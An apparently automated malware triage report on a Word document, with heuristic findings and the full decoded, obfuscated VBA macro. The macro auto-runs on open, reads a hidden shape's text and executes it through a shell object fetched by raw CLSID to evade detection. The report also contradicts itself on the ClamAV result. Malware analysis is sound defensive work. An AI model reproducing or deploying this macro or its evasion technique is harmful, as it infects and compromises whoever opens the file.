Verdict: MALICIOUS
Risk score: 252
Heuristics: 9
- ClamAV: Doc.Malware.Sagent-6775322-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Malware.Sagent-6775322-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings). Document contains VBA macro code.
- VBA instantiates a dangerous COM class by CLSID (critical, OLE_VBA_GETOBJECT_CLSID_DANGEROUS). VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
  Matched line in script: Set iTowITPEz = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + UlfazRYB)
- GetObject call (high, OLE_VBA_GETOBJ). GetObject call.
  Matched line in script: Set iTowITPEz = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + UlfazRYB)
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). AutoOpen macro.
  Matched line in script: Sub AutoOpen()
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD). Suspicious cmd.exe invocation with execution flag.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC). OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE). One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6494 bytes |

SHA-256: e28e2cbeb27a98feb9859e2908736c37d08d8cc1e083887370a79fb577df8173

Detection
ClamAV: No threats found
Obfuscation or payload: likely. 113 of 171 identifiers look randomly generated (e.g. 'FGqHUTvRsPz'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "OLDYozqhS"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case TLFabb
Case 75952162
wGUAqcL = 101978796
swaCUXEsP = CLng(70823143)
Case 210240416
QzzpFa = Oct(XIAFk)
GjEPRDw = dEZFQw
Case 260231923
hMRfK = CDate(JXLlCDrn)
qqbOrAdwH = Int(219722989 * ntXjocUXa)
End Select
On Error Resume Next
Select Case mtdstQqAP
Case 223505509
JbXBowzWw = 328667611
nJmvUMfw = CLng(141356546)
Case 325712532
jdIJiC = Oct(dYmDTZ)
sMhijKG = HGUGzviVR
Case 82148964
quttfRuKS = CDate(tkpMSbA)
PonMlWCpY = Int(32095438 * zDUqWj)
End Select
On Error Resume Next
Select Case wVsOmaFRl
Case 48188819
iSPDhfC = 236867178
SvXQWZpwc = CLng(292713704)
Case 69117667
HIXNw = Oct(OzCpJ)
VEkZrYZOE = cCzcrNlH
Case 268579917
wbWKsqkVn = CDate(qclavSpQ)
ESwwX = Int(211390240 * QUSBNuA)
End Select
On Error Resume Next
Select Case oUzsXXWa
Case 201888941
ChHhb = 235959991
LDcJhid = CLng(318128037)
Case 191194007
iwDLovjK = Oct(ziLzq)
XiIFLmw = fbUVXHpW
Case 314333917
qsiavOmYW = CDate(mszGmj)
AUqRt = Int(210496069 * YkTZMD)
End Select
Set mQGwwwi = Shapes("FGqHUTvRsPz")
On Error Resume Next
Select Case YhnIlju
Case 154493756
GbzcjjsOu = 57201732
XchzTKvQ = CLng(18519746)
Case 275046013
qMZnYvq = Oct(wTuZR)
jYkFP = wNXFvznpa
Case 260071446
UKklkDw = CDate(zXsKP)
DQznlLK = Int(258974659 * ZdoUrZIBb)
End Select
On Error Resume Next
Select Case dTfDmlK
Case 251066811
tIifZ = 180354342
wpMJBY = CLng(195305219)
Case 264557124
hYLmaEqvc = Oct(NfDzaA)
jpjvzWm = zwtnYE
Case 275141080
EFMzzcoSm = CDate(JNjvr)
IcsoHDhC = Int(161325217 * dFwIDL)
End Select
On Error Resume Next
Select Case jXsEWIzm
Case 237385527
dzmEiX = 28130040
IJYFGMioi = CLng(97357933)
Case 282358116
rWViP = Oct(LjNZr)
mzsijVw = vqJqOd
Case 111873490
ZhZlvfXG = CDate(IofMUlj)
uSIUwE = Int(83583929 * WJBNiQ)
End Select
XkDQYilRPQk = "" + BkAXK + sNBYDAOI + YlBGHi + wiVizzq + mQGwwwi.TextFrame.TextRange.Text + zZHEoosv + zjcwpdHz + wUDaq
On Error Resume Next
Select Case JMsiizo
Case 225496359
OdESOAFc = 80525277
dnqsozwJL = CLng(336514378)
Case 290095936
ucUKdFw = Oct(jZBoknjG)
pRPvO = pTUEilqc
Case 231324335
rjcwEWAfY = CDate(DmBHBQ)
GWhcbjpfr = Int(59972209 * NCqwS)
End Select
On Error Resume Next
Select Case awwvHFp
Case 107266212
iAUplFTR = 3925843
ciNzFJMc = CLng(24898631)
Case 253895588
KbjpnQ = Oct(WPORD)
kzptWz = bEtiuMwsl
Case 307833355
ldRTZnz = CDate(oSulUKivN)
USGGq = Int(289185278 * hCvaS)
End Select
Set iTowITPEz = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + UlfazRYB)
On Error Resume Next
Select Case ZDjQpzlT
Case 152051075
qnKUo = 340307376
CohaOZjBX = CLng(90896460)
Case 275539008
pXUfRWsE = Oct(jiLto)
RvVprYWq = RMKiwOS
Case 251080101
hhiVHszwv = CDate(TGWhaoSGC)
wNThvOF = Int(76888518 * HoRwPM)
End Select
Const tvOQQT = 0
On Error Resume Next
Select Case RtrKUvpF
Case 84749594
UUJpKPIH = 280449576
hviWlwbMK = CLng(69447647)
Case 72734952
BbpbcWC = Oct(japwXqS)
QMOVpKA = KUYVUdv
Case 15301947
tThAjmm = CDate(TGHFm)
ujzwwvpkq = Int(178555471 * QHzjCG)
End Select
On Error Resume Next
Select Case lTqjZijiU
Case 308831022
vOuoqEE = 107465168
EBHtBRXnO = CLng(302972129)
Case 282825092
iatUila = Oct(lpAbSYBii)
KhREnkMz = IKsPaDF
Case 112847501
BTITdWNP = CDate(fbcQt)
fjJGa = Int(257717271 * IlGSj)
End Select
On Error Resume Next
Select Case FAXtVbqw
Case 12071376
zvOIvIQ = 186460771
bpFwGLzZ = CLng(190645609)
Case 92325504
CSGBp = Oct(KBsMaaJN)
lsddh = dwJuACQi
Case 139586392
NkBUi = CDate(MTGzOkZBO)
kGaHwzjPZ = Int(150018182 * HomtTWKMp)
End Select
On Error Resume Next
Select Case DaSJph
Case 194014339
RMkzDi = 291407103
WjIZH = CLng(221940141)
Case 272119102
jizon = Oct(lUiHJ)
ULBuizDq = zBNNBNiQ
Case 21103443
VkQZK = CDate(oaKbPQwU)
pLfNu = Int(49012701 * zVjcmbm)
End Select
iTowITPEz.Run! XkDQYilRPQk, tvOQQT
On Error Resume Next
Select Case zmWzN
Case 14781048
iCfbfGT = 43728048
aYckSl = CLng(42966996)
Case 289403065
HFdtAU = Oct(DKqmRtXc)
HaSSA = UVUtKjYlL
Case 207905090
iFzvlCK = CDate(bwcTwjAzh)
LoZNOk = Int(57834529 * GKzfYiH)
End Select
On Error Resume Next
Select Case owiQhp
Case 175984007
TKcHfc = 172063891
oJqbPPmMK = CLng(31192175)
Case 213761031
TfJCziI = Oct(TwijHAH)
LYULqzS = CZzYLRFcJ
Case 457529
oBZIB = CDate(BasfKT)
IIBlkU = Int(236638552 * MQzZij)
End Select
End Sub